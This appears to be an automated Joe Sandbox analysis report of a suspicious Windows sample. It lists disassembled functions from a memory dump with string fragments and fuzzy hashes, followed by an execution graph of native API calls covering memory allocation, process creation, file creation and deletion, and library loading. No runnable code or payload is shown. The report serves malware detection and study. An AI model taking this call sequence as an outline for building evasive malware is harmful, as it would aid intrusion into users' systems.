                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                              • API String ID: 0-392141074
                                                              • Opcode ID: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                              • Instruction ID: 441d18a659c51138af198d41ee10022192066174bbb7caf845fdf2d6bf315761
                                                              • Opcode Fuzzy Hash: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                              • Instruction Fuzzy Hash: 5B713AB580031CAADB25DFA4DC81FEFB7BCBF48700F044599E519AA194EB715B488FA1
                                                              Function 035A2711 Relevance: 16.4, Strings: 13, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                              • API String ID: 0-392141074
                                                              • Opcode ID: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                              • Instruction ID: 52db553d68c7f522a2f3e8cc29df84a8b87e6b3b3419a45a622c54005a1a1902
                                                              • Opcode Fuzzy Hash: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                              • Instruction Fuzzy Hash: 1D6159B580431CAAEB25DFA4DC81FEFB7BCBF48300F044599E519AA190EB7157488FA1
                                                              Function 035963D2 Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                              • API String ID: 0-685823316
                                                              • Opcode ID: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                              • Instruction ID: c591eb89216d2d8be987272ccd01973a15e4a5f18cc9613e3b2fcaf580000cd1
                                                              • Opcode Fuzzy Hash: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                              • Instruction Fuzzy Hash: 773180B5D00318AAEF50DFD4DC84FEEBBB9BF48704F008559E618BA180DBB556488BA5
                                                              Function 0359D857 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$P$e$i$m$o$r$x
                                                              • API String ID: 0-620024284
                                                              • Opcode ID: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                              • Instruction ID: 3574b2b54d5f2792f04803adc7611684cf4bbe4521d6107cf264354af7b40597
                                                              • Opcode Fuzzy Hash: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                              • Instruction Fuzzy Hash: 59418779800318BAEB10EFA4EC40FDE737CBF98300F408599A509AB154EBB557498FA1
                                                              Function 0358AF58 Relevance: 10.1, Strings: 8, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4$XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-2821098887
                                                              • Opcode ID: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                              • Instruction ID: 08db1e9f51f5e68e3996946ca950ecb6d2efe154568af120d015ce656229ea47
                                                              • Opcode Fuzzy Hash: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                              • Instruction Fuzzy Hash: 4631CCB0C0129CEADB14CFA5DA886DDFFB0BB04749F608658C42A7F210D7318A46CF16
                                                              Function 0358EA0B Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$9$E$\$]$k$v${
                                                              • API String ID: 0-2353787348
                                                              • Opcode ID: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                              • Instruction ID: d5ce23f544af2ce90520adb33f6dbc3366841cb4be8b6292bcd9c9c61e55b245
                                                              • Opcode Fuzzy Hash: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                              • Instruction Fuzzy Hash: 5911DB10D0C7CADDDB12D7BC84086AEBF715F23224F0882D9D8E52B2D2D2794746C7A6
                                                              Function 035AA8EB Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L$S$\$a$c$e$l
                                                              • API String ID: 0-3322591375
                                                              • Opcode ID: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                              • Instruction ID: 39b9f6a3c0b2861eaeae131cd6d06ad25eedd20448092188c7aabec407197a0c
                                                              • Opcode Fuzzy Hash: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                              • Instruction Fuzzy Hash: 1A418876C04718AFDB50DFA8EC84BDEB7F8BF88700F05465AE909A7114EB715945CBA0
                                                              Function 035A24D6 Relevance: 7.7, Strings: 6, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: F$P$T$f$r$x
                                                              • API String ID: 0-2523166886
                                                              • Opcode ID: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                              • Instruction ID: b7bf12838f1f7a8fa6e50090d073a14bdbe3fba5ca01318a7e8f235130efd76b
                                                              • Opcode Fuzzy Hash: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                              • Instruction Fuzzy Hash: 7C51D570904705AAEB34DFA8EC85FEEF7B8FF44300F04096DE5095A1A0D7B4A649CBA1
                                                              Function 035A1BEB Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $i$l$o$u
                                                              • API String ID: 0-2051669658
                                                              • Opcode ID: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                              • Instruction ID: a2e05d68193b23d24cc853c65599c391ea055fecc2eae6269c12ee77211ec82f
                                                              • Opcode Fuzzy Hash: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                              • Instruction Fuzzy Hash: 61613EB5900B04AFDB24DBA8DC80FEFB7FCAB88700F144559E55AA7240E735AB45DB60
                                                              Function 035A1739 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                              • API String ID: 0-1319493415
                                                              • Opcode ID: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                              • Instruction ID: deda73dd4573454cc8c0af840fa58c179d854759f173a46a9e212d1083865d0e
                                                              • Opcode Fuzzy Hash: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                              • Instruction Fuzzy Hash: 95418DB59116097EEB11EB90DC82FFF777CBFAA700F004948F600AA194E774660687B6
                                                              Function 035A173B Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                              • API String ID: 0-1319493415
                                                              • Opcode ID: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                              • Instruction ID: e59e7ade8d8682896e6b2558effa0a33bd80e81a365db7ebc5bb211377039f61
                                                              • Opcode Fuzzy Hash: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                              • Instruction Fuzzy Hash: 68318B759116197EEB11EB91DC82FFF777CAF9A700F004448FA00AA194EB746A0287B6
                                                              Function 035A1878 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $e$k$o
                                                              • API String ID: 0-3624523832
                                                              • Opcode ID: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                              • Instruction ID: 7e2fa4554b18b250be429782722d13e2f4d31d50a1e341362213fdcdda94f69a
                                                              • Opcode Fuzzy Hash: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                              • Instruction Fuzzy Hash: 6DB12EB5A00B08AFDB14DBA8DC84FEFB7FDAF88700F148558E61A97240D675AB41DB50
                                                              Function 035A21B4 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $e$h$o
                                                              • API String ID: 0-3662636641
                                                              • Opcode ID: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                              • Instruction ID: 6ac4bf81c01769a409122f157c9e603e46e7eb1bcf27c1a15a79701871123d6f
                                                              • Opcode Fuzzy Hash: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                              • Instruction Fuzzy Hash: 6E8181B6C002596ADB21EB94DD85FEF737DFF8C200F0045DAE509AA054EB745B458FA1
                                                              Function 035A187B Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $e$k$o
                                                              • API String ID: 0-3624523832
                                                              • Opcode ID: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                              • Instruction ID: 69f94ddebfb4585a8f6ede894339c80b689705cd8b22e5ad3672d053b7aa66b6
                                                              • Opcode Fuzzy Hash: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                              • Instruction Fuzzy Hash: 9D6130B5A00B08AFDB14DFA8DC84FEFB7BDAF88700F148558E65997244DB31AA41DB50
                                                              Function 035A21BB Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $e$h$o
                                                              • API String ID: 0-3662636641
                                                              • Opcode ID: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                              • Instruction ID: 10c4fa96cd1b35e37e833061a468206ae7a7b61621c8f89488f2f161033188a9
                                                              • Opcode Fuzzy Hash: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                              • Instruction Fuzzy Hash: 194180B1C00359AADB11EFA4DD44FEEB3B9BF8C300F0045DAA50DAA155EB745B848FA5
                                                              Function 0359DA3B Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$U$g$r
                                                              • API String ID: 0-389700855
                                                              • Opcode ID: e9f1076cbba9a2a73c2caa7b8ebb51a73288b4aa9f5c2b418ca864eaa9be5405
                                                              • Instruction ID: 9c3002d069625b810bac8d8d5ef3248678a04c2f488c2a6da407c077b756a24b
                                                              • Opcode Fuzzy Hash: e9f1076cbba9a2a73c2caa7b8ebb51a73288b4aa9f5c2b418ca864eaa9be5405
                                                              • Instruction Fuzzy Hash: 9C3182B1910209BBEB00DFA4DC45BEF73B8FF44304F008589E908AB250EB71AA058BE5

                                                              Execution Graph

                                                              Execution Coverage:2.5%
                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                              Signature Coverage:2.3%
                                                              Total number of Nodes:440
                                                              Total number of Limit Nodes:70
                                                              execution_graph 101264 3209f20 101266 3209f2f 101264->101266 101265 3209f6d 101266->101265 101267 3209f5a CreateThread 101266->101267 101268 320b960 101271 322b760 101268->101271 101270 320cfd1 101274 32298e0 101271->101274 101273 322b791 101273->101270 101275 3229978 101274->101275 101277 322990e 101274->101277 101276 322998b NtAllocateVirtualMemory 101275->101276 101276->101273 101277->101273 101278 3217720 101279 3217738 101278->101279 101281 321778f 101278->101281 101279->101281 101282 321b660 101279->101282 101283 321b686 101282->101283 101284 321b8b3 101283->101284 101309 3229b50 101283->101309 101284->101281 101286 321b6f9 101286->101284 101312 322c9c0 101286->101312 101288 321b718 101288->101284 101289 321b7ec 101288->101289 101318 3228e30 101288->101318 101291 321b80b 101289->101291 101293 3215f50 LdrInitializeThunk 101289->101293 101297 321b89b 101291->101297 101329 32289a0 101291->101329 101293->101291 101294 321b7d4 101325 3218500 101294->101325 101295 321b783 101295->101284 101295->101294 101296 321b7b2 101295->101296 101322 3215f50 101295->101322 101344 3224ae0 LdrInitializeThunk 101296->101344 101303 3218500 LdrInitializeThunk 101297->101303 101305 321b8a9 101303->101305 101304 321b872 101334 3228a50 101304->101334 101305->101281 101307 321b88c 101339 3228bb0 101307->101339 101310 3229b6d 101309->101310 101311 3229b7e CreateProcessInternalW 101310->101311 101311->101286 101313 322c930 101312->101313 101314 322c98d 101313->101314 101345 322b8d0 101313->101345 101314->101288 101316 322c96a 101348 322b7f0 101316->101348 101319 3228e4a 101318->101319 101357 39f2c0a 101319->101357 101320 321b77a 101320->101289 101320->101295 101323 3215f8b 101322->101323 101360 3228ff0 101322->101360 101323->101296 101326 3218513 101325->101326 101366 3228d30 101326->101366 101328 321853e 101328->101281 101330 3228a1d 101329->101330 101331 32289cb 101329->101331 101372 39f39b0 LdrInitializeThunk 101330->101372 101331->101304 101332 3228a3f 101332->101304 101335 3228ad0 101334->101335 101337 3228a7e 101334->101337 101373 39f4340 LdrInitializeThunk 101335->101373 101336 3228af2 101336->101307 101337->101307 101340 3228c30 101339->101340 101342 3228bde 101339->101342 101374 39f2fb0 LdrInitializeThunk 101340->101374 101341 3228c52 101341->101297 101342->101297 101344->101294 101351 3229a90 101345->101351 101347 322b8e8 101347->101316 101354 3229ad0 101348->101354 101350 322b806 101350->101314 101352 3229aaa 101351->101352 101353 3229ab8 RtlAllocateHeap 101352->101353 101353->101347 101355 3229aea 101354->101355 101356 3229af8 RtlFreeHeap 101355->101356 101356->101350 101358 39f2c1f LdrInitializeThunk 101357->101358 101359 39f2c11 101357->101359 101358->101320 101359->101320 101361 32290a1 101360->101361 101363 322901f 101360->101363 101365 39f2d10 LdrInitializeThunk 101361->101365 101362 32290e3 101362->101323 101363->101323 101365->101362 101367 3228dae 101366->101367 101368 3228d5b 101366->101368 101371 39f2dd0 LdrInitializeThunk 101367->101371 101368->101328 101369 3228dd0 101369->101328 101371->101369 101372->101332 101373->101336 101374->101341 101375 32171a0 101376 32171ca 101375->101376 101379 3218330 101376->101379 101378 32171f1 101380 321834d 101379->101380 101386 3228f10 101380->101386 101382 321839d 101383 32183a4 101382->101383 101384 3228ff0 LdrInitializeThunk 101382->101384 101383->101378 101385 32183cd 101384->101385 101385->101378 101387 3228fab 101386->101387 101389 3228f3b 101386->101389 101391 39f2f30 LdrInitializeThunk 101387->101391 101388 3228fe1 101388->101382 101389->101382 101391->101388 101392 32111e0 101393 32111fa 101392->101393 101398 3214990 101393->101398 101395 3211215 101396 321125a 101395->101396 101397 3211249 PostThreadMessageW 101395->101397 101397->101396 101399 32149b4 101398->101399 101400 32149bb 101399->101400 101401 32149fb LdrLoadDll 101399->101401 101400->101395 101401->101400 101402 3228de0 101403 3228dfa 101402->101403 101406 39f2df0 LdrInitializeThunk 101403->101406 101404 3228e1f 101406->101404 101407 3228c60 101408 3228cf2 101407->101408 101410 3228c8e 101407->101410 101412 39f2ee0 LdrInitializeThunk 101408->101412 101409 3228d20 101412->101409 101413 32296e0 101414 3229757 101413->101414 101416 322970b 101413->101416 101415 322976a NtDeleteFile 101414->101415 101417 3212ba5 101420 32166d0 101417->101420 101419 3212bd0 101421 3216703 101420->101421 101422 3216727 101421->101422 101427 3229300 101421->101427 101422->101419 101424 321674a 101424->101422 101431 3229780 101424->101431 101426 32167ca 101426->101419 101428 322931a 101427->101428 101434 39f2ca0 LdrInitializeThunk 101428->101434 101429 3229343 101429->101424 101432 322979a 101431->101432 101433 32297a8 NtClose 101432->101433 101433->101426 101434->101429 101435 39f2ad0 LdrInitializeThunk 101441 322c8f0 101442 322b7f0 RtlFreeHeap 101441->101442 101443 322c905 101442->101443 101444 3209f80 101445 320a2cb 101444->101445 101447 320a659 101445->101447 101448 322b450 101445->101448 101449 322b476 101448->101449 101454 3204230 101449->101454 101451 322b482 101453 322b4bb 101451->101453 101457 3225950 101451->101457 101453->101447 101461 3213650 101454->101461 101456 320423d 101456->101451 101458 32259b2 101457->101458 101460 32259bf 101458->101460 101472 3211e00 101458->101472 101460->101453 101462 321366d 101461->101462 101464 3213680 101462->101464 101465 322a1c0 101462->101465 101464->101456 101467 322a1da 101465->101467 101466 322a209 101466->101464 101467->101466 101468 3228e30 LdrInitializeThunk 101467->101468 101469 322a266 101468->101469 101470 322b7f0 RtlFreeHeap 101469->101470 101471 322a27f 101470->101471 101471->101464 101473 3211e3b 101472->101473 101488 3218290 101473->101488 101475 3211e43 101476 322b8d0 RtlAllocateHeap 101475->101476 101486 321211b 101475->101486 101477 3211e59 101476->101477 101478 322b8d0 RtlAllocateHeap 101477->101478 101479 3211e6a 101478->101479 101480 322b8d0 RtlAllocateHeap 101479->101480 101481 3211e7b 101480->101481 101487 3211f15 101481->101487 101503 3216e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101481->101503 101483 3214990 LdrLoadDll 101484 32120cd 101483->101484 101499 3228290 101484->101499 101486->101460 101487->101483 101489 32182bc 101488->101489 101504 3218180 101489->101504 101492 32182e9 101493 3229780 NtClose 101492->101493 101496 32182f4 101492->101496 101493->101496 101494 321831d 101494->101475 101495 3218301 101495->101494 101497 3229780 NtClose 101495->101497 101496->101475 101498 3218313 101497->101498 101498->101475 101500 32282f2 101499->101500 101502 32282ff 101500->101502 101515 3212130 101500->101515 101502->101486 101503->101487 101505 321819a 101504->101505 101509 3218276 101504->101509 101510 3228ec0 101505->101510 101508 3229780 NtClose 101508->101509 101509->101492 101509->101495 101511 3228edd 101510->101511 101514 39f35c0 LdrInitializeThunk 101511->101514 101512 321826a 101512->101508 101514->101512 101517 3212150 101515->101517 101531 3218560 101515->101531 101524 32126b3 101517->101524 101535 3221510 101517->101535 101520 3212372 101521 322c9c0 2 API calls 101520->101521 101525 3212387 101521->101525 101522 32121ae 101522->101524 101538 322c890 101522->101538 101523 3218500 LdrInitializeThunk 101527 32123cb 101523->101527 101524->101502 101525->101527 101543 3210c80 101525->101543 101527->101523 101527->101524 101528 3210c80 LdrInitializeThunk 101527->101528 101528->101527 101529 3212520 101529->101527 101530 3218500 LdrInitializeThunk 101529->101530 101530->101529 101532 321856d 101531->101532 101533 3218593 101532->101533 101534 321858c SetErrorMode 101532->101534 101533->101517 101534->101533 101536 322b760 NtAllocateVirtualMemory 101535->101536 101537 3221531 101535->101537 101536->101537 101537->101522 101539 322c8a0 101538->101539 101540 322c8a6 101538->101540 101539->101520 101541 322b8d0 RtlAllocateHeap 101540->101541 101542 322c8cc 101541->101542 101542->101520 101544 3210c91 101543->101544 101547 3229a00 101544->101547 101548 3229a1a 101547->101548 101551 39f2c70 LdrInitializeThunk 101548->101551 101549 3210ca2 101549->101529 101551->101549 101552 321a001 101553 321a016 101552->101553 101554 321a01b 101552->101554 101555 321a04d 101554->101555 101556 322b7f0 RtlFreeHeap 101554->101556 101556->101555 101557 3217540 101558 321755c 101557->101558 101566 32175af 101557->101566 101559 3229780 NtClose 101558->101559 101558->101566 101560 3217577 101559->101560 101567 3216960 NtClose LdrInitializeThunk LdrInitializeThunk 101560->101567 101562 32176c1 101565 32176e7 101562->101565 101569 3216b30 NtClose LdrInitializeThunk LdrInitializeThunk 101562->101569 101566->101565 101568 3216960 NtClose LdrInitializeThunk LdrInitializeThunk 101566->101568 101567->101566 101568->101562 101569->101565 101570 321b140 101575 321ae50 101570->101575 101572 321b14d 101589 321aac0 101572->101589 101574 321b163 101576 321ae75 101575->101576 101600 3218760 101576->101600 101579 321afc3 101579->101572 101581 321afda 101581->101572 101582 321afd1 101582->101581 101584 321b0c7 101582->101584 101619 321a510 101582->101619 101586 321b12a 101584->101586 101628 321a880 101584->101628 101587 322b7f0 RtlFreeHeap 101586->101587 101588 321b131 101587->101588 101588->101572 101590 321aad6 101589->101590 101597 321aae1 101589->101597 101591 322b8d0 RtlAllocateHeap 101590->101591 101591->101597 101592 321ab08 101592->101574 101593 3218760 GetFileAttributesW 101593->101597 101594 321ae22 101595 321ae3b 101594->101595 101596 322b7f0 RtlFreeHeap 101594->101596 101595->101574 101596->101595 101597->101592 101597->101593 101597->101594 101598 321a510 RtlFreeHeap 101597->101598 101599 321a880 RtlFreeHeap 101597->101599 101598->101597 101599->101597 101601 321877f 101600->101601 101602 3218786 GetFileAttributesW 101601->101602 101603 3218791 101601->101603 101602->101603 101603->101579 101604 32236f0 101603->101604 101605 32236fe 101604->101605 101606 3223705 101604->101606 101605->101582 101607 3214990 LdrLoadDll 101606->101607 101608 3223737 101607->101608 101609 3223746 101608->101609 101632 32231b0 LdrLoadDll 101608->101632 101611 322b8d0 RtlAllocateHeap 101609->101611 101615 32238f1 101609->101615 101612 322375f 101611->101612 101613 32238e7 101612->101613 101614 322377b 101612->101614 101612->101615 101613->101615 101616 322b7f0 RtlFreeHeap 101613->101616 101614->101615 101617 322b7f0 RtlFreeHeap 101614->101617 101615->101582 101616->101615 101618 32238db 101617->101618 101618->101582 101620 321a536 101619->101620 101633 321df40 101620->101633 101622 321a5a8 101624 321a5c6 101622->101624 101625 321a730 101622->101625 101623 321a715 101623->101582 101624->101623 101638 321a3d0 101624->101638 101625->101623 101626 321a3d0 RtlFreeHeap 101625->101626 101626->101625 101629 321a8a6 101628->101629 101630 321df40 RtlFreeHeap 101629->101630 101631 321a92d 101630->101631 101631->101584 101632->101609 101635 321df64 101633->101635 101634 321df6d 101634->101622 101635->101634 101636 322b7f0 RtlFreeHeap 101635->101636 101637 321dfb0 101636->101637 101637->101622 101639 321a3ed 101638->101639 101642 321dfc0 101639->101642 101641 321a4f3 101641->101624 101643 321dfe4 101642->101643 101644 321e08e 101643->101644 101645 322b7f0 RtlFreeHeap 101643->101645 101644->101641 101645->101644 101646 321fc00 101647 321fc64 101646->101647 101648 32166d0 2 API calls 101647->101648 101650 321fd97 101648->101650 101649 321fd9e 101650->101649 101675 32167e0 101650->101675 101652 321ff52 101654 3229780 NtClose 101652->101654 101653 321fe1a 101653->101652 101672 321ff43 101653->101672 101679 321f9f0 101653->101679 101656 321ff5c 101654->101656 101657 321fe56 101657->101652 101658 321fe61 101657->101658 101659 322b8d0 RtlAllocateHeap 101658->101659 101660 321fe8a 101659->101660 101661 321fe93 101660->101661 101662 321fea9 101660->101662 101663 3229780 NtClose 101661->101663 101688 321f8e0 CoInitialize 101662->101688 101665 321fe9d 101663->101665 101666 321feb7 101691 3229270 101666->101691 101668 321ff32 101669 3229780 NtClose 101668->101669 101670 321ff3c 101669->101670 101671 322b7f0 RtlFreeHeap 101670->101671 101671->101672 101673 321fed5 101673->101668 101674 3229270 LdrInitializeThunk 101673->101674 101674->101673 101676 3216805 101675->101676 101695 3229130 101676->101695 101680 321fa0c 101679->101680 101681 3214990 LdrLoadDll 101680->101681 101683 321fa27 101681->101683 101682 321fa30 101682->101657 101683->101682 101684 3214990 LdrLoadDll 101683->101684 101685 321fafb 101684->101685 101686 3214990 LdrLoadDll 101685->101686 101687 321fb55 101685->101687 101686->101687 101687->101657 101690 321f945 101688->101690 101689 321f9db CoUninitialize 101689->101666 101690->101689 101692 322928d 101691->101692 101700 39f2ba0 LdrInitializeThunk 101692->101700 101693 32292ba 101693->101673 101696 322914a 101695->101696 101699 39f2c60 LdrInitializeThunk 101696->101699 101697 3216879 101697->101653 101699->101697 101700->101693 101701 3220500 101702 322051d 101701->101702 101703 3214990 LdrLoadDll 101702->101703 101704 3220538 101703->101704 101705 3221b40 101706 3221b5c 101705->101706 101707 3221b84 101706->101707 101708 3221b98 101706->101708 101710 3229780 NtClose 101707->101710 101709 3229780 NtClose 101708->101709 101711 3221ba1 101709->101711 101712 3221b8d 101710->101712 101715 322b910 RtlAllocateHeap 101711->101715 101714 3221bac 101715->101714 101716 32263c0 101717 322641a 101716->101717 101719 3226427 101717->101719 101720 3223e10 101717->101720 101721 322b760 NtAllocateVirtualMemory 101720->101721 101722 3223e51 101721->101722 101723 3214990 LdrLoadDll 101722->101723 101725 3223f50 101722->101725 101726 3223e91 101723->101726 101724 3223ed2 Sleep 101724->101726 101725->101719 101726->101724 101726->101725 101727 3229480 101728 3229537 101727->101728 101730 32294af 101727->101730 101729 322954a NtCreateFile 101728->101729 101731 3218c04 101733 3218c14 101731->101733 101732 3218adf 